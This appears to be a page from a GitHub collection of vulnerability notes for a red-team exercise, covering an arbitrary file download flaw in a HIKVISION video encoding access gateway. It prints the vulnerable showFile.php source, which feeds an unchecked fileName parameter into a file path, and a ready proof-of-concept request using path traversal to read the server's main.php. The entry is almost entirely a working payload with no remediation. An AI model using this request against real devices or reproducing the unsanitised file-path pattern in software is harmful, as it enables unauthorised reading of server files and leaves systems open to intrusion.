2023Hvv/HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞.md

20 lines
423 B
Markdown
Raw Permalink Normal View History

2023-08-13 14:27:10 +08:00
```
<?php
$file_name = $_GET['fileName'];
$file_path = '../../../log/'.$file_name;
$fp = fopen($file_path, "r");
while($line = fgets($fp)){
$line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
echo '<span style="font-size:16px">'.$line.'</span>';
}
fclose($fp);
?>
```
```
/serverLog/showFile.php?fileName=../web/html/main.php
```